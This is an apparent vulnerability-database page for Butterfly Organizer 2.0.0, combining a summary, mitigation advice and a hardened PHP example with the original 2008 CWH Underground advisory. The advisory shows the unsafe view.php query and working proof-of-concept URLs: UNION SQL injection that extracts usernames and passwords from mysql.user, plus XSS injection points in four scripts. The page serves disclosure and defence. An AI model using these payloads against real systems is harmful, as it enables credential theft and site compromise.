Vendor: Butterfly Organizer
By: CWH Underground
CVSS: 7.5 (HIGH)
Type: SQL Injection and XSS
CWE: 89, 79
Product Name: Butterfly Organizer
Affected Version From: 2.0.0
Affected Version To: 2.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:butterfly_media:butterfly_organizer:2.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities

Butterfly Organizer 2.0.0 builds a SQL query directly from the unvalidated mytable and id GET parameters in view.php, which allows an attacker to inject SQL commands that the backend database executes. An attacker can also inject JavaScript through the request parameters of several pages to perform XSS attacks. The vulnerable code is present in view.php, viewdb2.php, category-rename.php and module-contacts.php.

Mitigation:

Validate all user-supplied data before it is used: table names such as mytable should be checked against a fixed list of permitted tables, numeric values such as id should be parameterized or cast to an integer, and any value reflected into HTML should be encoded. Together these prevent both the SQL injection and the XSS attacks.
Source

Exploit-DB raw data:

======================================================================
 Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities
======================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE : 13 June 2008
SITE : www.citec.us


#####################################################
APPLICATION : Butterfly Organizer
VERSION     : 2.0.0
DOWNLOAD    : www.butterflymedia.ro/downloads/organizer_2_0_0.zip
#####################################################

+++ Remote SQL Injection Exploit +++

----------------------------
 Vulnerable Code [view.php]
----------------------------
@Line

   26: $mytable = $_GET['mytable'];
   27: $id = $_GET['id'];
   28:
   29: $result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database);
   30: $myrow = mysql_fetch_array($result);
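The following is an added example of a hardened replacement for the view.php fragment above; it is not Butterfly Organizer's code and was written for this page. It assumes a PDO connection (the DSN and credentials are placeholders) and an allowlist of table names, ALLOWED_TABLES, constructed for the example. Table names cannot be bound as query parameters, so the allowlist is what keeps values like mysql.user out of the FROM clause; the id value is bound as an integer parameter, so a UNION payload in id never reaches the parser; and the h() helper encodes everything reflected into the page, which is the same fix the mytable, tablehere and letter parameters of the other affected scripts need.

```php
<?php
// Added example, not Butterfly Organizer's own code: hardened handling of
// the mytable/id parameters that view.php passes straight into a query.
declare(strict_types=1);

// Constructed allowlist: the only tables view.php is meant to display.
const ALLOWED_TABLES = ['test_category', 'contacts', 'notes'];

function resolveTable(string $requested): string
{
    // Exact, case-sensitive match against the allowlist. Anything else
    // (another schema's table, SQL fragments, markup) is rejected outright.
    if (!in_array($requested, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException('unknown table');
    }
    return $requested;
}

function resolveId(string $requested): int
{
    // id must be a positive decimal integer; "-99999/**/UNION ..." fails here.
    if (!preg_match('/^[1-9][0-9]*$/', $requested)) {
        throw new InvalidArgumentException('invalid id');
    }
    return (int) $requested;
}

function fetchRow(PDO $pdo, string $table, int $id): ?array
{
    // $table has already been allowlisted, so interpolating it is safe;
    // $id is bound as an integer parameter instead of being concatenated.
    $stmt = $pdo->prepare("SELECT * FROM `{$table}` WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function h(string $s): string
{
    // Output encoding for every value reflected into HTML.
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// --- request handling ---
try {
    $table = resolveTable((string) ($_GET['mytable'] ?? ''));
    $id    = resolveId((string) ($_GET['id'] ?? ''));
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('Bad request');
}

// Placeholder DSN and credentials; adjust for the real deployment.
$pdo = new PDO('mysql:host=localhost;dbname=organizer;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES   => false, // real server-side prepared statements
]);

$row = fetchRow($pdo, $table, $id);
if ($row === null) {
    http_response_code(404);
    exit('Not found');
}

echo '<h1>' . h($table) . ' #' . h((string) $id) . '</h1>';
foreach ($row as $col => $val) {
    echo '<p>' . h((string) $col) . ': ' . h((string) ($val ?? '')) . '</p>';
}
```

Rejecting unknown table names with a 400 rather than silently substituting a default also gives the access log a clear signal: every probe against mytable shows up as a 4xx on view.php instead of a normal 200.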


----------
 Exploit
----------
[+] http://[Target]/[Organizer_Path]/view.php?id=<SQL INJECTION>&mytable=test_category


-------------
 POC Exploit
-------------
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/mysql.user&mytable=test_category
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(username,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/test_category&mytable=test_category



+++ Remote XSS Exploit +++


-----------
 Exploits
-----------
[+] http://[Target]/[Organizer_Path]/view.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/viewdb2.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/category-rename.php?tablehere=<XSS>
[+] http://[Target]/[Organizer_Path]/module-contacts.php?letter=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-13]